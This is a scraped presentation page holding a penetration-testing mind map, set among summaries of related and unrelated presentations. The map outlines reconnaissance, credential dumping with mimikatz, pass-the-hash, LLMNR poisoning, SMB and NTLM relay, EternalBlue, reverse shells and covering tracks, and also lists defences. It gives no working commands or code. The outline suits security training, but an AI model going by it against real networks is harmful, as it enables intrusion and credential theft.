The document provides an overview of penetration testing techniques and strategies. It discusses initial reconnaissance activities like scanning and enumeration. It then covers exploitation, maintaining access, and post-exploitation tactics like credential dumping, privilege escalation, and pivoting. Defense strategies are also mentioned such as disabling unnecessary services, requiring strong passwords, and limiting local administrator rights.
This document has been prepared in order to develop a good Penetration Testing and Vulnerability Assessment Lab. The document contains Hardware requirements, our manual & automated Software requirements, approaches for Performing Penetration testing.
Further, this document is design to make a Penetration test LAB in order to simulate the vulnerabilities in the testing environment and to execute the vulnerability assessment & penetration testing from the LAB by providing the Static IP to the Client, ensuring that the test is being performed from a valid/legitimate link.
FortiWeb is a web application firewall that provides three key layers of protection:
1) Anomaly detection using machine learning to identify abnormal traffic patterns without blocking benign anomalies.
2) Threat detection using pattern analysis and FortiGuard threat models to block known attacks.
3) Virtual patching to block exploits of known vulnerabilities in applications until they can be fully patched.
FortiWeb integrates with the Fortinet Security Fabric to provide broader visibility, protection, detection, and response for web applications and the digital attack surface.
The document provides an overview of the Open Web Application Security Project (OWASP). It discusses what OWASP is, the free resources it provides like publications, tools, and local chapters. It outlines some of OWASP's major publications like the OWASP Top 10 and Testing Guide. It also demonstrates the WebScarab and WebGoat tools. Finally, it describes the goals and offerings of the OWASP Cincinnati local chapter.
1) Spring Security provides authentication and authorization services for Java-based applications. It supports various authentication types including form-based, LDAP, and certificates.
2) Core concepts include the UserDetails interface for user information, UserDetailsService for retrieving user details, and the SecurityContext for holding authentication details.
3) Spring Security configuration is done primarily through the security namespace, defining things like the authentication manager, secured URLs, and form login details.
4) Method-level security and JSP tag libraries allow securing controller methods and restricting JSP content.
This document provides an overview of the OWASP Testing Guide for vulnerability assessment and penetration testing (VAPT). It defines key terms like vulnerability, threat, control, and vulnerability assessment. It explains the security principles of confidentiality, integrity, and availability (CIA). It then describes common sources of vulnerabilities and outlines various testing methodologies for information gathering, configuration management, identity and authentication, authorization, session management, input validation, error handling, cryptography, and client-side testing. It stresses the importance of customizing the testing plan for different application types and remembering best practices like following protocols, capturing accurate details of the tested systems, informing clients, and filtering false positives.
The document provides an overview of web application firewalls (WAFs) and the FortiWeb WAF product. It describes how WAFs protect web applications from code-based attacks like SQL injection and cross-site scripting. It outlines the key features of FortiWeb, including its ability to understand normal traffic patterns and block anomalies. The document also discusses emerging trends in the WAF market and how FortiWeb addresses needs like PCI compliance. It provides details on the FortiWeb product line and summarizes how it provides protection at multiple layers for web applications and servers.
The document discusses F5 Networks solutions for application delivery networking, including an overview of the F5 ADN and how it provides application acceleration, load balancing, security and other capabilities. Use cases are presented showing how the F5 ADN improves performance and user experience. Professional services and resources from F5 are also mentioned.
This document has been prepared in order to develop a good Penetration Testing and Vulnerability Assessment Lab. The document contains Hardware requirements, our manual & automated Software requirements, approaches for Performing Penetration testing.
Further, this document is design to make a Penetration test LAB in order to simulate the vulnerabilities in the testing environment and to execute the vulnerability assessment & penetration testing from the LAB by providing the Static IP to the Client, ensuring that the test is being performed from a valid/legitimate link.
FortiWeb is a web application firewall that provides three key layers of protection:
1) Anomaly detection using machine learning to identify abnormal traffic patterns without blocking benign anomalies.
2) Threat detection using pattern analysis and FortiGuard threat models to block known attacks.
3) Virtual patching to block exploits of known vulnerabilities in applications until they can be fully patched.
FortiWeb integrates with the Fortinet Security Fabric to provide broader visibility, protection, detection, and response for web applications and the digital attack surface.
The document provides an overview of the Open Web Application Security Project (OWASP). It discusses what OWASP is, the free resources it provides like publications, tools, and local chapters. It outlines some of OWASP's major publications like the OWASP Top 10 and Testing Guide. It also demonstrates the WebScarab and WebGoat tools. Finally, it describes the goals and offerings of the OWASP Cincinnati local chapter.
1) Spring Security provides authentication and authorization services for Java-based applications. It supports various authentication types including form-based, LDAP, and certificates.
2) Core concepts include the UserDetails interface for user information, UserDetailsService for retrieving user details, and the SecurityContext for holding authentication details.
3) Spring Security configuration is done primarily through the security namespace, defining things like the authentication manager, secured URLs, and form login details.
4) Method-level security and JSP tag libraries allow securing controller methods and restricting JSP content.
This document provides an overview of the OWASP Testing Guide for vulnerability assessment and penetration testing (VAPT). It defines key terms like vulnerability, threat, control, and vulnerability assessment. It explains the security principles of confidentiality, integrity, and availability (CIA). It then describes common sources of vulnerabilities and outlines various testing methodologies for information gathering, configuration management, identity and authentication, authorization, session management, input validation, error handling, cryptography, and client-side testing. It stresses the importance of customizing the testing plan for different application types and remembering best practices like following protocols, capturing accurate details of the tested systems, informing clients, and filtering false positives.
The document provides an overview of web application firewalls (WAFs) and the FortiWeb WAF product. It describes how WAFs protect web applications from code-based attacks like SQL injection and cross-site scripting. It outlines the key features of FortiWeb, including its ability to understand normal traffic patterns and block anomalies. The document also discusses emerging trends in the WAF market and how FortiWeb addresses needs like PCI compliance. It provides details on the FortiWeb product line and summarizes how it provides protection at multiple layers for web applications and servers.
The document discusses F5 Networks solutions for application delivery networking, including an overview of the F5 ADN and how it provides application acceleration, load balancing, security and other capabilities. Use cases are presented showing how the F5 ADN improves performance and user experience. Professional services and resources from F5 are also mentioned.
Nikto is a free and open source web server scanner used to identify vulnerabilities and help secure servers. It tests servers for over 6,500 dangerous files and scripts, outdated versions of software, and misconfigurations. Nikto scans target servers and outputs results that can help identify security problems. It has advantages like being fast, versatile, and open source, while its only disadvantage is needing to run via the command line.
Kali Linux is a Debian-based Linux distribution designed for penetration testing and security auditing. It includes over 500 security tools categorized under information gathering, vulnerability analysis, password attacks, wireless attacks, exploitation tools, maintaining access, and more. These tools are maintained by Offensive Security and aimed to help security professionals with tasks like scanning, penetration testing, forensics, and reverse engineering.
This document discusses using the OWASP Zed Attack Proxy (ZAP) tool to find vulnerabilities in web applications. ZAP is a free and open-source web application penetration testing tool that can be used to conduct both automated and manual testing of applications. The document provides an overview of ZAP's features, how to install and configure it, how to test applications for vulnerabilities using both automated and direct methods, and how to integrate ZAP with other tools.
Burp Suite is a Java-based tool for testing the security of web applications. It has free and paid versions. The tool's modules include Target, Proxy, Spider, Scanner, Intruder, Repeater, Sequencer, Decoder, Comparer, and Extender. The Target module provides an overview of the application. The Proxy module intercepts and inspects traffic between the browser and server. The Spider module automatically crawls the application. The Scanner module automatically scans for vulnerabilities. The Intruder module automates customized attacks. The Repeater module manually manipulates and reissues requests.
Beginner level presentation on Malware Identification as part of the Malware Reverse Engineering course. Learn what malware is, how it functions, how it can be detected, identified and isolated for reverse engineering. For more information about malware detection and removal visit https://www.intertel.co.za
SOC and SIEM systems can help organizations detect and respond to security incidents and threats in a timely manner. A SOC acts as a security operations center to monitor, analyze, and respond to cybersecurity incidents. SIEM provides real-time analysis of security alerts and events to help identify potential threats. Implementing SOC and SIEM solutions can improve an organization's security posture through early threat detection, compliance with regulations, and reduced breach impact.
The document provides information on OWASP ZAP, a free and open source web application security testing tool. It discusses what ZAP is, why it is a good choice for security testing, its key features which include an intercepting proxy, scanners, spiders, and fuzzing. It then describes how to launch and use ZAP, covering its graphical user interface, attacking websites by spidering, scanning and reviewing alerts. Key terms like session and context are also explained. Steps to run a scan are outlined, including crawling the site, creating a session and context, attacking with spider and active scans, and reviewing scan results. Finally, the difference between active and passive scans is summarized.
SOC presentation- Building a Security Operations CenterMichael Nickle
Presentation I used to give on the topic of using a SIM/SIEM to unify the information stream flowing into the SOC. This piece of collateral was used to help close the largest SIEM deal (Product and services) that my employer achieved with this product line.
This document discusses network security and penetration testing. It provides an overview of creating a networking lab and the tools used, including Cisco Packet Tracer, Backtrack, Metasploit, and Wireshark. The document then covers network security topics like common network threats, router security, switch security, and port security. It defines penetration testing and explains its goals of finding vulnerabilities and recommending improvements. The phases of penetration testing are outlined as profiling, enumeration, vulnerability analysis, exploitation, and reporting. Different styles of penetration testing like blue team and red team are also summarized.
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
The document provides information about the OWASP Top 10 2021 list of web application security risks. It describes the top risk, A01: Broken Access Control, giving its definition, examples of vulnerabilities it can enable, prevention methods, and examples. It also summarizes the second and third top risks, A02: Cryptographic Failures and A03: Injection, in a similar manner.
DCSF19 Container Security: Theory & Practice at NetflixDocker, Inc.
Michael Wardrop, Netflix
Usage of containers has undergone rapid growth at Netflix and it is still accelerating. Our container story started organically with developers downloading Docker and using it to improve their developer experience. The first production workloads were simple batch jobs, pioneering micro-services followed, then status as a first class platform running critical workloads.
As the types of workloads changed and their importance increased, the security of our container ecosystem needed to evolve and adapt. This session will cover some security theory, architecture, along with practical considerations, and lessons we learnt along the way.
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCasey Ellis
This deck goes through what Log4j is from ground-level concepts up, explains how Log4j works, how it is vulnerable, how the Log4shell exploit works, how to mitigate the risk and defend against exploitation, and some current observations through the Bugcrowd platform and predictions about what happens next.
Burp Suite is a Java based software platform of tools for performing security testing of web applications. The suite of products can be used to combine automated and manual testing techniques and consists of a number of different tools, such as a proxy server, a web spider, scanner, intruder, repeater, sequencer, decoder, collaborator and extender.
Static Analysis Security Testing for Dummies... and YouKevin Fealey
Most enterprise application security teams have at least one Static Analysis Security Testing (SAST) tool in their tool-belt; but for many, the tool never leaves the belt. SAST tools have gotten a reputation for being slow, error-prone, and difficult to use; and out of the box, many of them are – but with a little more knowledge behind how these tools are designed, a SAST tool can be a valuable part of any security program.
In this talk, we’ll help you understand the strengths and weaknesses of SAST tools by illustrating how they trace your code for vulnerabilities. You’ll see out-of-the-box rules for commercial and open-source SAST tools, and learn how to write custom rules for the widely-used open source SAST tool, PMD. We’ll explain the value of customizing tools for your organization; and you’ll learn how to integrate SAST technologies into your existing build and deployment pipelines. Lastly, we’ll describe many of the common challenges organizations face when deploying a new security tool to security or development teams, as well as some helpful hints to resolve these issues
A technical demo presentation showing an Evil Twin attack in action. The demo shows the attack from the victim, attacker, and evil twin perspectives. Background information is available. Full report is available at http://www.ericgoldman.name
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
a perfect example of your 6 weeks summer training ppt. Course-Ethical Hacking , its info and VAPT- Vulnerability Assessment n Penetration testing. about how vulnerability scanning , tools used , cracking password , etc.
CNIT 124 Ch 13: Post Exploitation (Part 1)Sam Bowne
Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne
Course Web page:
https://samsclass.info/124/124_F17.shtml
Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1 edition (June 8, 2014)
Security Testing is deemed successful when the below attributes of an application are intact
- Authentication
- Authorization
- Availability
- Confidentiality
- Integrity
- Non-Repudiation
Testing must start early to minimize defects and cost of quality. Security testing must start right from the Requirements Gathering phase to make sure that the quality of end-product is high.
This is to ensure that any intentional/unintentional unforeseen action does not halt or delay the system.
This document discusses techniques for enumerating information from Active Directory. It begins with an introduction and overview of the domain being targeted, CAPSULE.CORP. The agenda covers local privileges enumeration using MS-RPC to find local admin accounts, logon and session enumeration to detect where users are logged in from, and LDAP enumeration to discover objects and relationships. The document provides details on tools like PowerView that can be used to remotely enumerate SAM databases, network sessions, and query LDAP. It discusses attributes and groups of interest for users, computers, and privileges like delegation.
The document provides an outline for hacking different systems including performing internet footprinting, hacking Windows systems, hacking Unix/Linux systems, and hacking networks. It discusses techniques for scanning systems, enumerating services and users, penetrating targets by exploiting services or escalating privileges, gaining interactive access, and maintaining influence. It provides examples of tools that can be used for reconnaissance, attacks, and privilege escalation on the different system types. The document also covers vulnerabilities in systems like SNMP, HTTP, TFTP, and routing protocols that can be exploited, and techniques for dealing with firewalls like port scanning and redirection.
Nikto is a free and open source web server scanner used to identify vulnerabilities and help secure servers. It tests servers for over 6,500 dangerous files and scripts, outdated versions of software, and misconfigurations. Nikto scans target servers and outputs results that can help identify security problems. It has advantages like being fast, versatile, and open source, while its only disadvantage is needing to run via the command line.
Kali Linux is a Debian-based Linux distribution designed for penetration testing and security auditing. It includes over 500 security tools categorized under information gathering, vulnerability analysis, password attacks, wireless attacks, exploitation tools, maintaining access, and more. These tools are maintained by Offensive Security and aimed to help security professionals with tasks like scanning, penetration testing, forensics, and reverse engineering.
This document discusses using the OWASP Zed Attack Proxy (ZAP) tool to find vulnerabilities in web applications. ZAP is a free and open-source web application penetration testing tool that can be used to conduct both automated and manual testing of applications. The document provides an overview of ZAP's features, how to install and configure it, how to test applications for vulnerabilities using both automated and direct methods, and how to integrate ZAP with other tools.
Burp Suite is a Java-based tool for testing the security of web applications. It has free and paid versions. The tool's modules include Target, Proxy, Spider, Scanner, Intruder, Repeater, Sequencer, Decoder, Comparer, and Extender. The Target module provides an overview of the application. The Proxy module intercepts and inspects traffic between the browser and server. The Spider module automatically crawls the application. The Scanner module automatically scans for vulnerabilities. The Intruder module automates customized attacks. The Repeater module manually manipulates and reissues requests.
Beginner level presentation on Malware Identification as part of the Malware Reverse Engineering course. Learn what malware is, how it functions, how it can be detected, identified and isolated for reverse engineering. For more information about malware detection and removal visit https://www.intertel.co.za
SOC and SIEM systems can help organizations detect and respond to security incidents and threats in a timely manner. A SOC acts as a security operations center to monitor, analyze, and respond to cybersecurity incidents. SIEM provides real-time analysis of security alerts and events to help identify potential threats. Implementing SOC and SIEM solutions can improve an organization's security posture through early threat detection, compliance with regulations, and reduced breach impact.
The document provides information on OWASP ZAP, a free and open source web application security testing tool. It discusses what ZAP is, why it is a good choice for security testing, its key features which include an intercepting proxy, scanners, spiders, and fuzzing. It then describes how to launch and use ZAP, covering its graphical user interface, attacking websites by spidering, scanning and reviewing alerts. Key terms like session and context are also explained. Steps to run a scan are outlined, including crawling the site, creating a session and context, attacking with spider and active scans, and reviewing scan results. Finally, the difference between active and passive scans is summarized.
SOC presentation- Building a Security Operations CenterMichael Nickle
Presentation I used to give on the topic of using a SIM/SIEM to unify the information stream flowing into the SOC. This piece of collateral was used to help close the largest SIEM deal (Product and services) that my employer achieved with this product line.
This document discusses network security and penetration testing. It provides an overview of creating a networking lab and the tools used, including Cisco Packet Tracer, Backtrack, Metasploit, and Wireshark. The document then covers network security topics like common network threats, router security, switch security, and port security. It defines penetration testing and explains its goals of finding vulnerabilities and recommending improvements. The phases of penetration testing are outlined as profiling, enumeration, vulnerability analysis, exploitation, and reporting. Different styles of penetration testing like blue team and red team are also summarized.
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
The document provides information about the OWASP Top 10 2021 list of web application security risks. It describes the top risk, A01: Broken Access Control, giving its definition, examples of vulnerabilities it can enable, prevention methods, and examples. It also summarizes the second and third top risks, A02: Cryptographic Failures and A03: Injection, in a similar manner.
DCSF19 Container Security: Theory & Practice at NetflixDocker, Inc.
Michael Wardrop, Netflix
Usage of containers has undergone rapid growth at Netflix and it is still accelerating. Our container story started organically with developers downloading Docker and using it to improve their developer experience. The first production workloads were simple batch jobs, pioneering micro-services followed, then status as a first class platform running critical workloads.
As the types of workloads changed and their importance increased, the security of our container ecosystem needed to evolve and adapt. This session will cover some security theory, architecture, along with practical considerations, and lessons we learnt along the way.
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCasey Ellis
This deck goes through what Log4j is from ground-level concepts up, explains how Log4j works, how it is vulnerable, how the Log4shell exploit works, how to mitigate the risk and defend against exploitation, and some current observations through the Bugcrowd platform and predictions about what happens next.
Burp Suite is a Java based software platform of tools for performing security testing of web applications. The suite of products can be used to combine automated and manual testing techniques and consists of a number of different tools, such as a proxy server, a web spider, scanner, intruder, repeater, sequencer, decoder, collaborator and extender.
Static Analysis Security Testing for Dummies... and YouKevin Fealey
Most enterprise application security teams have at least one Static Analysis Security Testing (SAST) tool in their tool-belt; but for many, the tool never leaves the belt. SAST tools have gotten a reputation for being slow, error-prone, and difficult to use; and out of the box, many of them are – but with a little more knowledge behind how these tools are designed, a SAST tool can be a valuable part of any security program.
In this talk, we’ll help you understand the strengths and weaknesses of SAST tools by illustrating how they trace your code for vulnerabilities. You’ll see out-of-the-box rules for commercial and open-source SAST tools, and learn how to write custom rules for the widely-used open source SAST tool, PMD. We’ll explain the value of customizing tools for your organization; and you’ll learn how to integrate SAST technologies into your existing build and deployment pipelines. Lastly, we’ll describe many of the common challenges organizations face when deploying a new security tool to security or development teams, as well as some helpful hints to resolve these issues
A technical demo presentation showing an Evil Twin attack in action. The demo shows the attack from the victim, attacker, and evil twin perspectives. Background information is available. Full report is available at http://www.ericgoldman.name
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
a perfect example of your 6 weeks summer training ppt. Course-Ethical Hacking , its info and VAPT- Vulnerability Assessment n Penetration testing. about how vulnerability scanning , tools used , cracking password , etc.
CNIT 124 Ch 13: Post Exploitation (Part 1)Sam Bowne
Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne
Course Web page:
https://samsclass.info/124/124_F17.shtml
Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1 edition (June 8, 2014)
Security Testing is deemed successful when the below attributes of an application are intact
- Authentication
- Authorization
- Availability
- Confidentiality
- Integrity
- Non-Repudiation
Testing must start early to minimize defects and cost of quality. Security testing must start right from the Requirements Gathering phase to make sure that the quality of end-product is high.
This is to ensure that any intentional/unintentional unforeseen action does not halt or delay the system.
This document discusses techniques for enumerating information from Active Directory. It begins with an introduction and overview of the domain being targeted, CAPSULE.CORP. The agenda covers local privileges enumeration using MS-RPC to find local admin accounts, logon and session enumeration to detect where users are logged in from, and LDAP enumeration to discover objects and relationships. The document provides details on tools like PowerView that can be used to remotely enumerate SAM databases, network sessions, and query LDAP. It discusses attributes and groups of interest for users, computers, and privileges like delegation.
The document provides an outline for hacking different systems including performing internet footprinting, hacking Windows systems, hacking Unix/Linux systems, and hacking networks. It discusses techniques for scanning systems, enumerating services and users, penetrating targets by exploiting services or escalating privileges, gaining interactive access, and maintaining influence. It provides examples of tools that can be used for reconnaissance, attacks, and privilege escalation on the different system types. The document also covers vulnerabilities in systems like SNMP, HTTP, TFTP, and routing protocols that can be exploited, and techniques for dealing with firewalls like port scanning and redirection.
This document provides an overview and schedule for a training on active deception techniques for red and blue teams. It covers topics like external reconnaissance, privilege escalation, and lateral movement. Deception strategies are discussed for each topic to detect adversarial activities like DNS reconnaissance, exploiting unattend files, or cloning webpages. The training will include hands-on exercises and visualizations in Kibana to detect engagement with deception assets.
The document discusses various methods for hardening Linux security, including securing physical and remote access, addressing top vulnerabilities like weak passwords and open ports, implementing security policies, setting BIOS passwords, password protecting GRUB, choosing strong passwords, securing the root account, disabling console programs, using TCP wrappers, protecting against SYN floods, configuring SSH securely, hardening sysctl.conf settings, leveraging open source tools like Mod_Dosevasive, Fail2ban, Shorewall, and implementing security at the policy level with Shorewall.
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureMongoDB
Your MongoDB Community Edition database can probably be a lot more secure than it is today, since Community Edition provides a wide range of capabilities for securing your system, and you are probably not using them all. If you are worried about cyber-threats, take action reduce your anxiety!
This document discusses securing Windows networks. It begins with discussing hacker personas and common security mistakes made. It then covers securing Windows networks by discussing system administrator personas, threats like password attacks and remote code execution vulnerabilities, and countermeasures. It also discusses the Microsoft Secure Windows Initiative and staying secure through awareness, vulnerability assessment, and responding to security events. The focus is on implementing security through practices like strong passwords, keeping systems patched, and using tools like the Microsoft Baseline Security Analyzer.
The document discusses various techniques for hacking systems, including password cracking, privilege escalation, executing applications remotely, and using keyloggers and spyware. It provides an overview of tools that can perform functions like password cracking, sniffing network traffic, capturing credentials, escalating privileges, executing code remotely, and logging keystrokes covertly. Countermeasures to these techniques, like disabling LM hashes, changing passwords regularly, and using antivirus software, are also covered.
This document provides instructions for installing and configuring an LDAP server and phpLDAPadmin on a CentOS system. The key steps include:
1. Installing LDAP server software and configuring the slapd.conf file.
2. Initializing the LDAP directory with a root user and organizational units.
3. Installing and configuring phpLDAPadmin to manage the LDAP server over a web interface.
This document provides instructions for installing and configuring an LDAP server plus phpLDAPadmin on a CentOS system. The key steps include:
1. Installing LDAP server packages and configuring slapd.conf and the LDAP database.
2. Initializing the LDAP directory with a root user and organizational units.
3. Installing a web server and phpLDAPadmin to provide a web interface for managing the LDAP server.
4. Configuring phpLDAPadmin to connect to the LDAP server by editing its config.php file.
Author: Jameel Nabbo
Company: UITSEC
This guide contain a practical hands on Linux privilege escalation techniques and methods. based on a real penetration testing experience.
As shown by headlines and countless intrusions, even moderately skilled attackers can sail through the defenses of a typical corporate network. Using a playbook of techniques both common and uncommon, intruders can bypass almost all security barriers despite even tough policies on end users and admins. But failure is not inevitable for a defender. There are many practical ways a network can be constructed that will wipe out most of the playbook, and they don’t always require expensive purchases.
Security must be built from the start, and this presentation will show you how it’s done; how to intelligently look at threats and plan defenses for a Windows network.
The document outlines strategies for securing a network from intrusion and exploitation. It discusses how typical networks are easily compromised and provides recommendations across three key areas: network defenses, host defenses, and preventing exploits. Specific controls are proposed such as air gapping systems where possible, whitelisting applications and traffic, using smart cards for authentication instead of passwords, virtual machine isolation, and proactively patching and updating systems.
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
This document provides guidance on securing a web application hosted on a virtual private server (VPS). It discusses selecting secure software like Linux, Nginx, PHP and MySQL. It recommends hosting on a VPS for control over security. Key areas covered include hardening the operating system, configuring the web server, application and database securely, enabling HTTPS, securing remote access via SSH, using a firewall and fail2ban. It also discusses securing backups, accounts with the host and administrator laptop. The document aims to be comprehensive in addressing security at each layer for the web application.
InSecure Remote Operations - NullCon 2023 by Yossi SassiYossi Sassi
- The document discusses remote operations and credential exposure during remote management. It highlights the use of various living off the land techniques like RPC, WMI, PSRemoting and RDP.
- It provides tips for preventing lateral movement without dedicated security products by leveraging configurations like LogonWorkstations to restrict where accounts can logon.
- The key takeaways are to embrace a living off the land mindset, be aware of credential exposure risks during remote operations, and that single configurations can be effective for preventing issues like lateral movement when properly configured and monitored.
The document summarizes security advice for securing Windows networks. It discusses revealing hacker personas including automated attacks, targeted attacks, and the different skill levels of hackers from lame to sophisticated. It then discusses top security mistakes made and demonstrates how to secure Windows networks using features in Windows Server 2003 like group policy templates. Security improvements in Windows XP Service Pack 2 are also summarized, including network protection technologies like Windows Firewall and memory protection with Data Execution Prevention.
Neville Varnham discusses various cyber security threats related to PeopleSoft systems. He notes that ransomware schemes now allow technically illiterate criminals to conduct cyber attacks. Password cracking software can crack simple passwords in under a minute. The document also discusses a past university data breach involving PeopleSoft after a student was able to access a database with Social Security numbers. Varnham provides an overview of steps organizations can take to harden their PeopleSoft security, such as enabling encryption, implementing password policies, and ensuring proper logging and auditing.
MongoDB World 2019: Tutorial: A Journey to Magical Security Creatures’ LandMongoDB
The interactive presentation will use a metaphor, comparing security features to magical creatures, in that they both must be treated right. This game-based learning session will help audiences to understand the security features MongoDB has to offer and how to use them correctly.
Carlos García - Pentesting Active Directory [rooted2018]RootedCON
Introducción a las pruebas de intrusión en entornos Microsoft Active Directory en forma de ponencia práctica para auditores o personas interesadas en el pentesting en entornos corporativos. Se dará una breve introducción al servicio de directorio Active Directory y sus componentes más críticos desde el punto de vista de la seguridad.Posteriormente, se explicarán las principales diferencias con respecto a un pentesting clásico de infraestructura, así como las técnicas y ataques más comunes para llevar a cabo el ejercicio y comprometer completamente el dominio corporativo.Requisitos: Se recomienda que los asistentes tengan conocimientos básicos de Active Directory y básicos/medios de pentesting o hacking ético, preferiblemente en infraestructuras y/o Sistemas Operativos.
Storytelling For The Web: Integrate Storytelling in your Design ProcessChiara Aliotta
In this slides I explain how I have used storytelling techniques to elevate websites and brands and create memorable user experiences. You can discover practical tips as I showcase the elements of good storytelling and its applied to some examples of diverse brands/projects..
Decormart Studio is widely recognized as one of the best interior designers in Bangalore, known for their exceptional design expertise and ability to create stunning, functional spaces. With a strong focus on client preferences and timely project delivery, Decormart Studio has built a solid reputation for their innovative and personalized approach to interior design.
International Upcycling Research Network advisory board meeting 4Kyungeun Sung
Slides used for the International Upcycling Research Network advisory board 4 (last one). The project is based at De Montfort University in Leicester, UK, and funded by the Arts and Humanities Research Council.
Architectural and constructions management experience since 2003 including 18 years located in UAE.
Coordinate and oversee all technical activities relating to architectural and construction projects,
including directing the design team, reviewing drafts and computer models, and approving design
changes.
Organize and typically develop, and review building plans, ensuring that a project meets all safety and
environmental standards.
Prepare feasibility studies, construction contracts, and tender documents with specifications and
tender analyses.
Consulting with clients, work on formulating equipment and labor cost estimates, ensuring a project
meets environmental, safety, structural, zoning, and aesthetic standards.
Monitoring the progress of a project to assess whether or not it is in compliance with building plans
and project deadlines.
Attention to detail, exceptional time management, and strong problem-solving and communication
skills are required for this role.
Practical eLearning Makeovers for EveryoneBianca Woods
Welcome to Practical eLearning Makeovers for Everyone. In this presentation, we’ll take a look at a bunch of easy-to-use visual design tips and tricks. And we’ll do this by using them to spruce up some eLearning screens that are in dire need of a new look.
Explore the essential graphic design tools and software that can elevate your creative projects. Discover industry favorites and innovative solutions for stunning design results.
Connect Conference 2022: Passive House - Economic and Environmental Solution...TE Studio
Passive House: The Economic and Environmental Solution for Sustainable Real Estate. Lecture by Tim Eian of TE Studio Passive House Design in November 2022 in Minneapolis.
- The Built Environment
- Let's imagine the perfect building
- The Passive House standard
- Why Passive House targets
- Clean Energy Plans?!
- How does Passive House compare and fit in?
- The business case for Passive House real estate
- Tools to quantify the value of Passive House
- What can I do?
- Resources
EASY TUTORIAL OF HOW TO USE CAPCUT BY: FEBLESS HERNANEFebless Hernane
CapCut is an easy-to-use video editing app perfect for beginners. To start, download and open CapCut on your phone. Tap "New Project" and select the videos or photos you want to edit. You can trim clips by dragging the edges, add text by tapping "Text," and include music by selecting "Audio." Enhance your video with filters and effects from the "Effects" menu. When you're happy with your video, tap the export button to save and share it. CapCut makes video editing simple and fun for everyone!
Visual Style and Aesthetics: Basics of Visual Design
Visual Design for Enterprise Applications
Range of Visual Styles.
Mobile Interfaces:
Challenges and Opportunities of Mobile Design
Approach to Mobile Design
Patterns
Revolutionizing the Digital Landscape: Web Development Companies in Indiaamrsoftec1
Discover unparalleled creativity and technical prowess with India's leading web development companies. From custom solutions to e-commerce platforms, harness the expertise of skilled developers at competitive prices. Transform your digital presence, enhance the user experience, and propel your business to new heights with innovative solutions tailored to your needs, all from the heart of India's tech industry.
Technoblade The Legacy of a Minecraft Legend.Techno Merch
Technoblade, born Alex on June 1, 1999, was a legendary Minecraft YouTuber known for his sharp wit and exceptional PvP skills. Starting his channel in 2013, he gained nearly 11 million subscribers. His private battle with metastatic sarcoma ended in June 2022, but his enduring legacy continues to inspire millions.
1. Penetration Testing
Scanning &
Enumeration
Exploitation
Reconaissance
Scanning
Nmap
Netdiscover
arp-scan
Active Directory
Brute Force Attacks
Email Address Gathering
Identify Target
Hunter.io (Domain Search)
bugcrowd.com
Maintaining Access
Persistence Scripts
Scheduled Tasks
Add a user
Enumeration
HTTP/HTTPS
SMB
SSH
Crdential Stuffing
Post-Exploitation
Pivoting
Covering Tracks
Make the System/Network as
it was when you entered it
Remove executables, scripts, and added files
Remove malware, rootkits, and added user accounts
Set settings back to original configurations
Breached Credentials
OSINT
Subdomains
Sublist3r
crt.sh
OWASP Amass
Identify Website
Technologies
Information Gathering with Burp Suite
Google Fu
Social Media
Overview
Target Validation
Finding Subdomains
Fingerprinting
Data Breaches
WHOIS
nslookup
dnsrecon
Google Fu
dig
Nmap
Sublist3r
Bluto
crt.sh
Nmap
Wappalyzer
WhatWeb
BuiltWith
Netcat
HaveIbeenPwned
Breach-Parse
WeLeakInfo
Breach-Parse
Tomnomnom HTTPprobe
BuiltWith
Wappalizer
whatweb
LinkedIn
Twitter
The Harvester
Masscan
Metasploit
Nessus
Nikto
Dirbuster
Dirb
Gobuster
Source Code
Burp Suite
Msfconsole - smb_version
smbclient
enum4linux (not working properly)
Connection attempt
Vulnerability Research
Google
Searchsploit
Exploit Database
Metasploit - search
Password Spraying
Metasploit
Hydra
Hashes Dumping / Cracking
SAM
SAM
SECURITY
SYSTEM
secretsdump
John
Hashcat
crackmapexec
psexec
Pass-The-Hash
Pass-The-Hash
Eternal Blue
MS17_010
Metasploit smb_ms17_010
AutoBlue alternative to metasploit
smbclient
Credentials
Kiwi
Metasploit
Mimikats
Tokens
Stealing &
Manipulation
Metasploit Incognito
FTP
Password dumping
Hash dumping
Golden Tickets
Password dumping in memory
Password dumping
Password dumping in memory
Hash dumping
Golden Tickets
Default Creds Common Bad Password List
Word List Generator
CEWL
Buffer Overflow
Spiking
Fuzzing
Finding the Offset
Overwriting the EIP
Finding Bad Characters
Finding the Right Module
Generating Shellcode / Getting Root
LLMNR Poisoning
Capturing NTLMv2 Hashes
Password Cracking (Hashcat)
Defences
SMB Relay Attacks
Host Discovery
SMB Signing Disabled
Disable LLMNR and NBT-NS
Require Network Access Control
Require Strong User Passwords
LLMNR
NBT-NS
DNS/MDNS
Responder
Responder
Nessus
Gain Shell Access
Responder
ntlmrelayx
Nmap script
Privilege Escalation
anonymous access
binary
Network
ipconfig /all
arp -a
route print
netstat -ano
Davtest
Test Server upload
WEB
Web Applications
Finding Subdomains
Find Alive Domains
SQL Injection
XXS
https://github.com/danielmiessler/SecLists
https://github.com/initstring/passphrase-wordlist
SAM Hashes Dump
Interactive shell -i
Command execute -c
Execute .exe file -e
Crack offline
Pass-the-Hash
HTTP Off
SMB Off
msfvenom
Reverse shell
Netcat
Powershell
msf web_delivery
other
meterpreter
Defences
Enable SMB signing on all devices
Disable NTLM Authentication
Account tiering
It will completely stop the attack
Performance issues with file copy
Stops the attack
If Kerberos stops working, back to NTLM
Admin only logging into their accounts / servers / domain controllers
Local Admin restriction No local Admin prevent lateral movement
msfconsole
psexec.py
smbexec.py
wmiexec.py
exploit/windows/smb/psexec
exploit/windows/smb/psexec_psh
AV noisy
Less noisy / Half-shell
Less noisy / Half-shell
IPv6 Attacks
LDAP Relay
mitm6
ntlmrelayx
